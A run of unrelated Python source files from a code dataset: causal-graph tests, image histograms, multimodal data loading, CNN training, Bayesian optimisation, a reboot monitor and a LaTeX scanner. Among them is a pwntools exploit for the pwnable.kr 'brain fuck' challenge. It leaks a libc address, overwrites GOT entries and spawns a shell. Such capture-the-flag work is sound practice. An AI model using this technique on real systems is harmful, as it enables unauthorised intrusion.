NxMixedGraph.from_edges(\n directed=[(X @ -x, Y @ -x), (X @ +x, Y @ +x)], undirected=[(Y @ -x, Y @ +x)]\n )\n\n expected_event6 = {Y @ -x: -y, Y @ +x: +y}\n self.assert_graph_equal(expected_graph6, actual_graph6)\n self.assertEqual(expected_event6, actual_event6)\n\n # Check that a triplet world graph is not inconsistent\n actual_graph7, actual_event7 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(\n directed=[(X, W), (W, Y), (D, Z), (Z, Y), (A, B), (B, Y)], undirected=[(X, Y)]\n ),\n event={Y @ +x: +y, X: -x, Z @ -d: -z, D: -d, A: +A},\n )\n self.assertIsNotNone(actual_event7)\n expected_graph7 = NxMixedGraph.from_edges(\n directed=[(D, Z), (B, Y @ +X), (W @ +X, Y @ +X), (Z, Y @ +X), (A, B), (X @ +X, W @ +X)],\n undirected=[(X, Y @ +X)],\n )\n self.assert_graph_equal(expected_graph7, actual_graph7)\n\n actual_graph8, actual_event8 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(X, Z), (Z, Y)]),\n event={Y @ -x: -y, Y @ +x: -y, Z @ +x: -z, Z @ -x: -z},\n )\n expected_graph8 = NxMixedGraph.from_edges(\n directed=[(X @ -x, Z @ -x), (Z @ -x, Y @ -x), (X @ +x, Z @ +x)],\n undirected=[(Z @ -x, Z @ +x)],\n )\n\n expected_event8 = {Y @ -X: -Y, Z @ +X: -Z, Z @ -X: -Z}\n self.assert_graph_equal(expected_graph8, actual_graph8)\n self.assertEqual(expected_event8, 
actual_event8)\n","sub_path":"tests/test_algorithm/test_cg.py","file_name":"test_cg.py","file_ext":"py","file_size_in_byte":33399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"189402936","text":"import numpy as np \nimport cv2 \nfrom matplotlib import pyplot as plt \n\n\nimg = cv2.imread(\"lena.jpg\") \nb,g,r = cv2.split(img)\n\n# Display the histograms of img, blue, green, red\nplt.hist(img.ravel(),256,[0,256])\nplt.hist(b.ravel(),256,[0,256])\nplt.hist(g.ravel(),256,[0,256])\nplt.hist(r.ravel(),256,[0,256])\nplt.show()\n\n# Display images \ncv2.imshow(\"Image\", img)\ncv2.imshow(\"Blue\", b)\ncv2.imshow(\"Green\", g)\ncv2.imshow(\"Red\", r)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"opencv_image_histogram_2.py","file_name":"opencv_image_histogram_2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"579319711","text":"import numpy as np\nfrom mmdata import MOSI\n\ndef pad(data, max_len):\n    \"\"\"A function for padding/truncating sequence data to a given length\"\"\"\n    # recall that data at each time step is a tuple (start_time, end_time, feature_vector), we only take the vector\n    data = np.array([feature[2] for feature in data])\n    n_rows = data.shape[0]\n    dim = data.shape[1]\n    if max_len >= n_rows:\n        diff = max_len - n_rows\n        padding = np.zeros((diff, dim))\n        padded = np.concatenate((padding, data))\n        return padded\n    else:\n        return data[-max_len:]\n\ndef get_data(max_len_audio=20, max_len_text=15, max_len_visual=20):\n    mosi = MOSI()\n    embeddings = mosi.embeddings()\n    facet = mosi.facet()\n    covarep = mosi.covarep()\n    sentiments = mosi.sentiments() # sentiment labels, real-valued. for this tutorial we'll binarize them\n    train_ids = mosi.train()\n    valid_ids = mosi.valid()\n    test_ids = mosi.test()\n    # sort through all the video ID, segment ID pairs\n    train_set_ids = []\n    for vid in train_ids:\n        for sid in embeddings['embeddings'][vid].keys():\n            if embeddings['embeddings'][vid][sid] and facet['facet'][vid][sid] and covarep['covarep'][vid][sid]:\n                train_set_ids.append((vid, sid))\n\n    valid_set_ids = []\n    for vid in valid_ids:\n        for sid in embeddings['embeddings'][vid].keys():\n            if embeddings['embeddings'][vid][sid] and facet['facet'][vid][sid] and covarep['covarep'][vid][sid]:\n                valid_set_ids.append((vid, sid))\n\n    test_set_ids = []\n    for vid in test_ids:\n        for sid in embeddings['embeddings'][vid].keys():\n            if embeddings['embeddings'][vid][sid] and facet['facet'][vid][sid] and covarep['covarep'][vid][sid]:\n                test_set_ids.append((vid, sid))\n\n    # partition the training, valid and test embeddings; all sequences will be padded/truncated to 15 steps\n    # data will have shape (dataset_size, max_len, feature_dim)\n    max_len = max_len_audio\n    train_set_audio = np.stack([pad(covarep['covarep'][vid][sid], max_len) for (vid, sid) in train_set_ids if covarep['covarep'][vid][sid]], axis=0)\n    valid_set_audio = np.stack([pad(covarep['covarep'][vid][sid], max_len) for (vid, sid) in valid_set_ids if covarep['covarep'][vid][sid]], axis=0)\n    test_set_audio = np.stack([pad(covarep['covarep'][vid][sid], max_len) for (vid, sid) in test_set_ids if covarep['covarep'][vid][sid]], axis=0)\n\n    max_len = max_len_visual\n    train_set_visual = np.stack([pad(facet['facet'][vid][sid], max_len) for (vid, sid) in train_set_ids], axis=0)\n    valid_set_visual = np.stack([pad(facet['facet'][vid][sid], max_len) for (vid, sid) in valid_set_ids], axis=0)\n    test_set_visual = 
np.stack([pad(facet['facet'][vid][sid], max_len) for (vid, sid) in test_set_ids], axis=0)\n\n max_len = max_len_text\n train_set_text = np.stack([pad(embeddings['embeddings'][vid][sid], max_len) for (vid, sid) in train_set_ids], axis=0)\n valid_set_text = np.stack([pad(embeddings['embeddings'][vid][sid], max_len) for (vid, sid) in valid_set_ids], axis=0)\n test_set_text = np.stack([pad(embeddings['embeddings'][vid][sid], max_len) for (vid, sid) in test_set_ids], axis=0)\n # binarize the sentiment scores for binary classification task\n y_train = np.array([sentiments[vid][sid] for (vid, sid) in train_set_ids]) > 0\n y_valid = np.array([sentiments[vid][sid] for (vid, sid) in valid_set_ids]) > 0\n y_test = np.array([sentiments[vid][sid] for (vid, sid) in test_set_ids]) > 0\n\n # train_set_audio = train_set_audio[:,:,1:35]\n # valid_set_audio = valid_set_audio[:,:,1:35]\n # test_set_audio = test_set_audio[:,:,1:35]\n\n visual_max = np.max(np.max(np.abs(train_set_visual), axis=0), axis=0)\n visual_max[visual_max==0] = 1 # if the maximum is 0 we don't normalize this dimension\n train_set_visual = train_set_visual / visual_max\n valid_set_visual = valid_set_visual / visual_max\n test_set_visual = test_set_visual / visual_max\n\n train_set_visual[train_set_visual != train_set_visual] = 0\n valid_set_visual[valid_set_visual != valid_set_visual] = 0\n test_set_visual[test_set_visual != test_set_visual] = 0\n\n audio_max = np.max(np.max(np.abs(train_set_audio), axis=0), axis=0)\n audio_max[audio_max==0] = 1\n train_set_audio = train_set_audio / audio_max\n valid_set_audio = valid_set_audio / audio_max\n test_set_audio = test_set_audio / audio_max\n\n train_set_audio[train_set_audio != train_set_audio] = 0\n valid_set_audio[valid_set_audio != valid_set_audio] = 0\n test_set_audio[test_set_audio != test_set_audio] = 0\n\n return train_set_audio, valid_set_audio, test_set_audio, train_set_text, valid_set_text, test_set_text, train_set_visual, valid_set_visual, test_set_visual, y_train, y_valid, y_test","sub_path":"fusion/multimodaldata.py","file_name":"multimodaldata.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"618459404","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom PatchCreator import PATCH_SIZE\nfrom Paths import *\n\n\ndef train_net():\n input_shape = (PATCH_SIZE, PATCH_SIZE, 1)\n\n model = Sequential()\n # this applies 32 convolution filters of size 3x3 each.\n model.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2, activation='softmax'))\n\n sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n\n train_datagen = ImageDataGenerator(rescale=1./255)\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n train_data_dir = OUTPUT_PATH + TRAIN_PATH\n validation_data_dir = OUTPUT_PATH + 
VAL_PATH\n\n nb_train_samples = 43680\n nb_validation_samples = 20000\n epochs = 50 # 10\n batch_size = 32\n\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(PATCH_SIZE, PATCH_SIZE),\n batch_size=batch_size,\n class_mode='categorical',\n classes=['liver', 'non_liver'],\n color_mode=\"grayscale\")\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(PATCH_SIZE, PATCH_SIZE),\n batch_size=batch_size,\n class_mode='categorical',\n classes=['liver', 'non_liver'],\n color_mode=\"grayscale\")\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples//batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples//batch_size)\n\n model.save('liver_vgg_model_wide.h5')\n\n # score = model.evaluate_generator(validation_generator, nb_validation_samples)\n # print(score)\n\n\nif __name__ == \"__main__\":\n train_net()\n","sub_path":"netTrain.py","file_name":"netTrain.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"158386522","text":"\"\"\" bayesianOptimization.py\n\nBayesian optimisation of cost functions.\n\"\"\"\n\nimport numpy as np\nimport sklearn.gaussian_process as gp\nfrom acquisitionFunction import expectedImprovement, probabilityImprovement\n\n\"\"\" bayesianOptimisation\n\n Uses Gaussian Processes to optimise the loss function `sample_loss`.\n\n Arguments:\n ----------\n n_iters: integer.\n Number of iterations to run the search algorithm.\n costFunction: function.\n Function to be optimized.\n bounds: array-like, shape = [n_params, 2].\n Lower and upper bounds on the parameters of the function `sample_loss`.\n n_params: integer.\n Number of parameters to be optimized\n x0: array-like, shape = [n_pre_samples, n_params].\n Array of initial points to sample the loss function for. 
If None, randomly\n        samples from the loss function.\n    n_pre_samples: integer.\n        If x0 is None, samples `n_pre_samples` initial points from the loss function.\n    gaussian_process: sklearn.gaussian_process.gpr.GaussianProcessRegressor.\n        Predefined object from the GaussianProcessRegressor class that represents the Gaussian process model.\n    alpha: double.\n        Variance of the error term of the GP.\n    acquisitionFunction: string.\n        Choose the acquisition function used to retrieve the next best sample from the Gaussian process,\n        either 'expected_improvement' or 'probability_improvement'.\n    random_search: integer.\n        Flag that indicates whether to perform random search or L-BFGS-B optimisation\n        over the acquisition function.\n    epsilon: double.\n        Precision tolerance for floats.\n    \"\"\"\n\n\ndef bayesianOptimisation(n_iters, costFunction, bounds, n_params, x0=None, n_pre_samples=10,\n                         gaussian_process=None, alpha=1e-5, acquisitionFunction='expected_improvement', random_search=False, epsilon=1e-7):\n\n    if acquisitionFunction == 'expected_improvement':\n        acquisition = expectedImprovement(n_params)\n\n    elif acquisitionFunction == 'probability_improvement':\n        acquisition = probabilityImprovement(n_params)\n\n    else:\n        raise ValueError(\"acquisitionFunction must be 'expected_improvement' or 'probability_improvement'\")\n\n\n    x_list = []\n    y_list = []\n    ybest_list = []\n    best_score = np.inf\n\n    n_params = bounds.shape[0]\n\n    if x0 is None:\n        for params in np.random.uniform(bounds[:, 0], bounds[:, 1], (n_pre_samples, bounds.shape[0])):\n            x_list.append(params)\n            y_list.append(costFunction(params, plot=True))\n    else:\n        for params in x0:\n            x_list.append(params)\n            y_list.append(costFunction(params, plot=True))\n\n    xp = np.array(x_list)\n    yp = np.array(y_list)\n\n    # Create the GP\n\n    if gaussian_process is not None:\n        model = gaussian_process #gp.GaussianProcessRegressor(**gp_params)\n        if 'X_train_' in dir(model):\n            xp = model.X_train_\n            yp = model.y_train_ + model.y_train_mean\n\n    else:\n        # kernel = gp.kernels.Matern(length_scale = [100,10000,10000000,1,1,1,1,1,1,1])\n        # kernel = gp.kernels.Sum(gp.kernels.Matern(),gp.kernels.Matern()) \n        kernel = gp.kernels.Matern(length_scale=1.0)\n        # kernel = gp.kernels.RBF(length_scale=0.1)\n        # kernel = gp.kernels.DotProduct(1,1)\n\n        model = gp.GaussianProcessRegressor(kernel=kernel,\n                                            alpha=alpha,\n                                            n_restarts_optimizer=10,\n                                            normalize_y=True)\n\n    for n in range(n_iters):\n        print(\"Iteration\", n)\n        model.fit(xp, yp)\n\n        # Sample next hyperparameter\n        if random_search:\n            x_random = np.random.uniform(bounds[:, 0], bounds[:, 1], size=(random_search, n_params))\n            ei = -1 * acquisition.sampleFunction(x_random, model, yp)\n            next_sample = x_random[np.argmax(ei), :]\n        \n        else:\n            next_sample = acquisition.optimizeAcquisition(model, yp, bounds=bounds, n_restarts=10)\n\n        # Duplicates will break the GP. 
In case of a duplicate, we will randomly sample a next query point.\n        if np.any(np.all(np.abs(next_sample - xp) <= epsilon, axis=1)):\n            print('duplicate')\n            next_sample = np.random.uniform(bounds[:, 0], bounds[:, 1], bounds.shape[0])\n        \n\n        # Sample loss for new set of parameters\n        cv_score = costFunction(next_sample,plot=True)\n        if cv_score < best_score:\n            best_score = cv_score\n\n        # Update lists\n        x_list.append(next_sample)\n        y_list.append(cv_score)\n        ybest_list.append(best_score)\n\n        # Update xp and yp\n        xp = np.array(x_list)\n        yp = np.array(y_list)\n        ybest = np.array(ybest_list)\n    return xp, yp, ybest, model\n\nif __name__ == '__main__':\n    pass","sub_path":"bayesianOptimization.py","file_name":"bayesianOptimization.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"270081629","text":"\"\"\"Treadmill reboot monitor.\n\nThe monitor will watch a /reboots/<hostname> Zookeeper node.\n\nIf the node exists and was created after the server was rebooted, the server\nwill reboot.\n\nIf the node exists but was created before the server was rebooted, the node\nwill be deleted (as the server was already rebooted).\n\nThe actual reboot procedure is specified on the command line. Prior to\ninvoking the plugin, a graceful shutdown is performed.\n\"\"\"\n\n\nimport logging\nimport os\nimport time\n\nimport click\n\nfrom .. import context\nfrom .. import exc\nfrom .. import sysinfo\nfrom .. import zkutils\nfrom .. import zknamespace as z\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef init():\n    \"\"\"Top level command handler.\"\"\"\n\n    # TODO: main is too long, need to be refactored.\n    #\n    # pylint: disable=R0915\n    @click.command()\n    @click.argument('command', nargs=-1)\n    def reboot_monitor(command):\n        \"\"\"Runs node reboot monitor.\"\"\"\n        reboot_cmd = list(command)\n        _LOGGER.info('Initializing reboot monitor: %r', reboot_cmd)\n\n        zkclient = context.GLOBAL.zk.conn\n        zkclient.add_listener(zkutils.exit_on_lost)\n\n        while not zkclient.exists(z.REBOOTS):\n            _LOGGER.warn('%r node not created yet. 
Cell masters running?',\n z.REBOOTS)\n time.sleep(30)\n\n hostname = sysinfo.hostname()\n up_since = sysinfo.up_since()\n\n _LOGGER.info('Server: %s, up since: %s', hostname, up_since)\n reboot_path = z.path.reboot(hostname)\n\n @zkclient.DataWatch(reboot_path)\n @exc.exit_on_unhandled\n def _watch_version(_data, stat, event):\n \"\"\"Watch reboot node.\"\"\"\n\n # If the node is deleted, we exit to pick up new version code.\n if event is not None and event.type == 'DELETED':\n _LOGGER.info('Node deleted, ignore.')\n return True\n\n if not stat:\n _LOGGER.info('Node does not exist, ignore.')\n return True\n\n if stat.created > up_since:\n _LOGGER.info('Reboot requested at: %s, up since: %s',\n time.ctime(stat.created),\n time.ctime(up_since))\n\n # Strictly speaking this is not enough for graceful shutdown.\n #\n # We need a proper shutdown procedure developed.\n presence_path = z.path.server_presence(hostname)\n _LOGGER.info('Deleting server presence: %s', presence_path)\n zkutils.ensure_deleted(zkclient, presence_path)\n\n _LOGGER.info('Checking blackout list.')\n zk_blackout_path = z.path.blackedout_server(hostname)\n while zkclient.exists(zk_blackout_path):\n _LOGGER.info('Node blacked out - will wait.')\n time.sleep(60)\n\n _LOGGER.info('exec: %r', reboot_cmd)\n os.execvp(reboot_cmd[0], reboot_cmd)\n else:\n _LOGGER.info('Reboot success, requested at %s, up since: %s',\n stat.created, up_since)\n zkutils.ensure_deleted(zkclient, reboot_path)\n _LOGGER.info('Deleting zknode: %r', reboot_path)\n\n return True\n\n while True:\n time.sleep(100000)\n\n _LOGGER.info('service shutdown.')\n\n return reboot_monitor\n","sub_path":"treadmill/sproc/reboot_monitor.py","file_name":"reboot_monitor.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"403090057","text":"'''\npwnables.kr - brain fuck\n\nWriteup: https://ginjabenjamin.github.io/pwn/2017/06/15/pwnableskr-brain-fuck\n'''\nfrom pwn import *\n\n# libc values; readelf -s bf_libc.so | grep [function]\nlibc = ELF(\"./bf_libc.so\")\n\noffsetSystem = libc.symbols['system'] # = 0x0003a920\noffsetFgets = libc.symbols['fgets'] # = 0x0005d540\n\n# Addresses (bf)\nbfMain = 0x08048671 # objdump -d bf | grep main\nbfDo_brainfuck = 0x080485dc # objdump -d bf | grep do_brainfuck\nbfFgets = 0x0804a010\nbfMemset = 0x0804a02c\nbfTape = 0x0804a0a0\n\nDEBUG = 1\n\nif(len(sys.argv) > 1 and sys.argv[1] == 'pwn'):\n p = remote('pwnable.kr', 9001)\nelse:\n p = process('./bf')\n\np.recvuntil('[ ]\\n')\n\n# Move from input string (tape) to fgets@GOT\npayload = '<'*(bfTape - bfFgets)\n\n# Leak fgets@GOT\npayload += '.>'*4 # Read fgets())\npayload += '<'*4 # Move back to fgets())\n\n# Change fgets@GOT to system@GOT\npayload += ',>'*4 # Overwrite fgets() with system()\npayload += '<'*4 # Move back to fgets())\n\n# Change memset@GOT to fgets@GOT\npayload += '>'*(bfMemset - bfFgets) # Move to memset()\npayload += ',>'*4 # Overwrite memset() with fgets()\n\n# Change putchar@GOT to main()\npayload += ',>'*4 # Overwrite putchar() with main()\n\n# Call putchar() which invokes main()\npayload += '.'\n\n# Setup attack\np.sendline(payload)\n\n# Read address of fgets()\naddrFgets = int(p.recvn(4)[::-1].encode('hex'), 16)\nlog.info('fgets@GOT: ' + str(addrFgets))\n\naddrSystem = addrFgets - offsetFgets + offsetSystem\n#log.info('system: ' + str(hex(addrSystem)))\n\n# Submit our stack frame\np.send(p32(addrSystem)) # Call system()\np.send(p32(addrFgets - offsetFgets + 
libc.symbols['gets'])) # Canary\np.send(p32(bfMain)) # Return to main()\np.sendline('/bin/sh') # Argument for system()\n\np.interactive()\n","sub_path":"objects/pwnableskr-brain-fuck/brainfuck-solve.py","file_name":"brainfuck-solve.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"533792360","text":"#!/usr/bin/env python\n\n# T e x S c a n n e r . p y\n#\n# Defines a TexScanner class that can be used to extract LaTeX directives\n# from a .tex file. Call SetFile() to supply a reference to an already\n# open .tex file, then use successive calls to GetNextTexCommand() to get \n# all the tex directives and their parameters from the file. This probably\n# isn't of very general utility when it comes to parsing .tex files, but\n# it is useful for the ADASS editing purposes for which it was written,\n# where all that was wanted was to find graphics or citation commands and\n# see what files or references they were using.\n#\n# Parsing LaTeX files is tricky, and this code isn't perfect by any means.\n# There are lots of constructs that will fool it, usually into missing\n# commands that it ought to spot. If it manages to spot any problems, this\n# can be checked using a call to ParsedOK() and details of any problem can\n# be obtained by calling GetReport(). In testing, I have seen this parser\n# complain about unclosed braces that turn out to be due to an unescaped\n# comment character that LaTeX has not complained about. (Parsing problems\n# often seem to be associated with the use of '{','[' and '%' in math\n# expressions, and it may be that the parser needs to know about math mode.)\n# This code would benefit from a proper review and possible reworking some day.\n#\n# History:\n# 14th Jan 2016. Original version, KS.\n# 28th Jan 2016. GetNextWord() now allows for nesting. GetNextTexCommand()\n# now allows for any number of required and/or optional\n# arguments. The list it returns can be of any length, not\n# always one of three items, so calling code will need to\n# be modified. KS.\n# 1st Feb 2016. Interface to GetNextTexCommand() reworked to use a\n# callback for each new command found. This should make it\n# easier to introduce a recursive scan that catches commands\n# included within the arguments to other commands, although\n# at the moment this is not implemented. KS.\n# 11th Feb 2016. GetTexCommand() now does do a recursive scan through the\n# arguments of the commands it finds. KS.\n# 16th Feb 2016. Now catches multiple LaTeX directives in one argument, eg\n# \\citetext{\\citealp{l1980}, implemented in \\citealp{w12}}\n# 30th Mar 2016. Now checks to see if '%' characters are comment characters\n# or just literal '%' that have been escaped. KS.\n# 7th Apr 2016. Fixed obscure parsing bug triggered by the sequence \n# \"$\\mu$m\" which caused the scanning of the string containing\n# it to be terminated prematurely. It's because the code\n# had assumed that all \\directives would be terminated by\n# a line break, space, or a '{' or '[', which is not of\n# course the case. Strange it took this long to show up. KS.\n# 12th Apr 2016. GetNextChar() now intercepts \"\\n\" characters and treats\n# them as spaces - this is essentially what LaTeX does. KS.\n# 2nd May 2016. Fixed a parsing problem where a slightly unusual sequence\n# (involving a \\newcommand definition on a single line} sent\n# the parser into infinite recursion. KS.\n# 24th Jul 2017. 
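The address arithmetic behind the exploit above, shown in isolation: one leaked libc pointer (fgets@GOT) plus the static symbol offsets of the matching libc build resolve any other libc symbol. The offsets are the ones noted in the script; the leaked runtime value below is a made-up stand-in for illustration.

```python
offset_fgets = 0x0005d540   # readelf -s bf_libc.so | grep fgets
offset_system = 0x0003a920  # readelf -s bf_libc.so | grep system

leaked_fgets = 0xf7e2d540   # hypothetical value read back from fgets@GOT
libc_base = leaked_fgets - offset_fgets
addr_system = libc_base + offset_system

assert addr_system == leaked_fgets - offset_fgets + offset_system
```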
Fixed a problem seen in a .tex file that had an equation\n# that involved an escaped brace '\\{' character. This was\n# being treated as a delimiter, with unfortunate results.\n# WasEscaped now records if the last character, as returned\n# by GetNextChar(), was escaped, and GetNextWord() uses this\n# to ignore escaped braces and parentheses. KS.\n# 25th Jul 2017. Added a check for a parser runaway, and the routines\n# ParsedOK() and GetReport(). GetNextWordFromString{} now\n# has the same tests for escaped braces as used by\n# GetNextWord(). KS.\n# 15th Aug 2017. Converted to run under Python3, using 2to3. Added\n# the importing of items from __future__ to allow this to\n# run under either Python2 or Python3. (In actuality, this\n# code worked unchanged under Python3, and since it doesn't\n# use print, doesn't really need that future import, but it\n# seems to be good practice anyway.) KS.\n#\n\nfrom __future__ import (print_function,division,absolute_import)\n\nimport os\nimport sys\nimport string\n\nclass TexScanner(object):\n\n def __init__(self):\n self.FileIdSet = False\n self.Escaped = False\n self.WasEscaped = False\n self.LastChar = \"\"\n self.LastWord = \"\"\n self.Line = 0\n self.Problems = []\n \n def SetFile(self,FileId) :\n \n # Needs to be called before any of the Get... routines. This passes\n # the Id of an open .tex file to the scanner.\n \n self.FileId = FileId\n self.FileIdSet = True\n self.Line = 0\n self.Problems = []\n \n def ParsedOK(self) :\n \n # Returns True if the .tex file parsed without problems. If it returns\n # False, GetReport() can be called to get a description of what happened.\n \n return (len(self.Problems) == 0)\n \n def GetReport(self) :\n \n # If the file parsed with problems, this returns a list of strings that\n # describe what happened. If the file parsed OK, this returns an empty\n # list.\n \n return self.Problems\n \n def GetNextChar(self) :\n \n # Returns the next character from a .tex file. If a comment character\n # ('%') is encountered, this skips to the end of the current line and\n # returns the newline character at the end. If the end of the file is\n # reached, or if the file is not open, this returns an empty string. \n # Allow for the case where the comment character was escaped, in which\n # case treat it as a literal '%'. LaTeX treats an end of line like a \n # space, and we intercept \"\\n\" characters and turn them into spaces to\n # get the same effect.\n \n Char = \"\"\n if (self.FileIdSet) :\n Char = self.FileId.read(1)\n if (Char == \"%\") :\n if (not self.Escaped) :\n while (True) :\n Char = self.FileId.read(1)\n if (Char == \"\\n\" or Char == \"\") : break\n self.WasEscaped = self.Escaped\n self.Escaped = (Char == \"\\\\\")\n if (Char == \"\\n\") :\n Char = \" \"\n self.Line = self.Line + 1\n return Char \n \n def GetNextLine(self) :\n \n # Returns the next line from a .tex file, with comments stripped out.\n # This means anything in a line from the first '%' character up to but\n # not including the final newline character is removed from the line.\n # It does mean than a line that starts with a '%' is returned as a\n # blank line - just a newline; it is not ignored completely. If the\n # end of the file is reached, or the file is not open, this returns\n # an empty string. 
(Note that this routine isn't used any more by the\n # other routines in this file, although it was originally.)\n \n Result = \"\"\n while (True) :\n Char = self.GetNextChar()\n Result = Result + Char\n if (Char == \"\\n\" or Char == \"\") : break\n return Result\n \n def GetNextWord(self):\n \n # Returns the next 'word' from a .tex file. Comments are ignored, and\n # a 'word' is defined slightly unusually here in order to help with\n # processing LaTeX directives. Anything enclosed in {} or in []\n # braces or brackets, including the enclosing {} or [] is considered\n # a word. Blanks and { and [ characters delimit words, as do the \n # ends of lines, which are assumed to be one or more of \\n and \\r\n # characters. Ends of lines are removed when encountered within\n # {} or [] characters.\n \n Word = \"\"\n \n # Find the first non-blank character (treating newline characters\n # and carriage returns as blanks).\n \n while (True) :\n if (self.LastChar != \"\") :\n Char = self.LastChar\n else :\n Char = self.GetNextChar()\n self.LastChar = \"\"\n if (Char != \" \" and Char != \"\\n\" and Char != \"\\r\") : break\n if (Char != \"\") :\n Word = Word + Char\n \n # If the word started with a { or [, then we ignore blanks and\n # keep going until we hit the corresponding closing character\n # (or the end of the file). Allow for nesting. Note that when\n # GetNextChar() returns an empty string, that's the end of the file.\n \n Escaped = self.WasEscaped\n if ((Char == \"{\" or Char == \"[\") and not Escaped) :\n Start = Char\n if (Start == \"{\") : End = \"}\"\n if (Start == \"[\") : End = \"]\"\n Nesting = 1\n Line = self.Line + 1\n while (True) :\n Char = self.GetNextChar()\n if (Char == \"\") :\n self.Problems.append(\n \"The file appears to have an unclosed '\" \\\n + Start + \"' in line \" + str(Line))\n self.Problems.append(\"The file may be missing a '\" + End + \\\n \"' character or there may\")\n self.Problems.append(\n \"be a problem with nested braces or with '%' characters\")\n break\n Escaped = self.WasEscaped\n if (Char != '\\n' and Char != '\\r') : Word = Word + Char\n if (Char == Start and not Escaped) : Nesting = Nesting + 1\n if (Char == End and not Escaped) :\n Nesting = Nesting - 1\n if (Nesting <= 0) : break\n \n else :\n\n # Otherwise, just keep going until we hit a blank or one of\n # the delimiting braces. Either of these will terminate the word,\n # but if it was a brace, we need to remember it for the next\n # time we're called. \n\n while (True) :\n Char = self.GetNextChar()\n Escaped = self.WasEscaped\n if (Char == \"\") : break\n if (Char == \" \" or Char == '\\r' or Char == '\\n') : break\n if ((Char == \"{\" or Char == \"[\") and not Escaped) :\n self.LastChar = Char\n break\n Word = Word + Char\n return Word\n \n def GetNextTexCommand(self,Callback,ClientData,ClientExtra) :\n \n # Searches for the next Tex/LaTeX command read from the open .tex file.\n # and calls the specified callback routine with the details of the\n # command. The callback routine is called with a first argument that\n # gives the command details, followed by the arguments supplied \n # as ClientData and ClientExtra. The command details are supplied \n # as a list of strings. The first is the LaTeX directive, beginning\n # with '\\'. Subsequent strings are the arguments that followed\n # the directive, either {required} (in curly braces) or [optional]\n # (in square brackets). The arguments are returned with the beginning\n # and ending braces included. 
If the end of the file is reached, this\n # routine returns True; otherwise it returns False.\n #\n # Because the arguments for the LaTeX command may themselves contain\n # further LaTeX commands, this routine also searches recursively\n # through each argument, and will call the callback routine for each\n # command found. To get every LaTeX command in the .tex file, this\n # routine should continue to be called until it returns True.\n #\n # Callback can be passed as None, in which case no callback is made -\n # this can be used for a quick check that the file can be parsed.\n \n Finished = True\n Command = []\n Directive = \"\"\n while (True) :\n if (self.LastWord == \"\") :\n Word = self.GetNextWord()\n else :\n Word = self.LastWord\n self.LastWord = \"\"\n if (Word == \"\") : break\n # (This doesn't handle the case where there are multiple directives\n # in the one word, eg \"\\it{text}\\emph{text}\". It will only find\n # the first.)\n BSlashIndex = Word.find('\\\\')\n if (BSlashIndex >= 0) :\n Directive = Word[BSlashIndex:]\n break\n if (Directive != \"\") :\n Command.append(Directive)\n Word = self.GetNextWord()\n while (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n Command.append(Word)\n \n # Search each argument recursively for any LaTeX commands\n # it may contain.\n \n Word = Word[1:len(Word) - 1]\n self.GetNextTexCommandFromString(Word,\\\n Callback,ClientData,ClientExtra)\n Word = self.GetNextWord()\n else :\n self.LastWord = Word\n break\n if (Callback != None) : Callback(Command,ClientData,ClientExtra)\n Finished = False\n return Finished\n \n def GetNextWordFromString(self, String, Posn):\n \n # Returns the next 'word' from a string, given the string and a start\n # position in the string. It is assumed that the string contains no\n # comments. A 'word' is defined slightly unusually here in order to \n # help with processing LaTeX directives. Anything enclosed in {} or\n # in [] braces or brackets, including the enclosing {} or [] is \n # considered a word. Blanks and { and [ characters delimit words.\n # This routine returns a pair comprising the word and the value\n # for Posn to be used for the next call. When the end of the string\n # is reached, the pair returned is (\"\",0). The Posn value starts from\n # 0, in the usual Python way.\n #\n # This code is similar in structure to GetNextWord(), but it's easier\n # to move around in a string than it is in a file. Note the assumption\n # that this will be used mainly on words that have been obtained via\n # GetNextWord() and so will already have things like comments stripped\n # out. The intent is that this will be used recursively to split up\n # words that themselves contain LaTeX commands, eg\n # \\center{\\it{text}\\cite{ref}}\n # where GetNextWord will find \"\\center\" and then \"{\\it{text}\\cite{ref}}\"\n # and we need to use this routine to split up that nested second word.\n \n Word = \"\"\n Char = \"\"\n Escaped = False\n if (Posn > 0) :\n Escaped = (String[Posn - 1] == '\\\\')\n \n # Find the first non-blank character.\n \n Index = Posn\n while (Index < len(String)) :\n 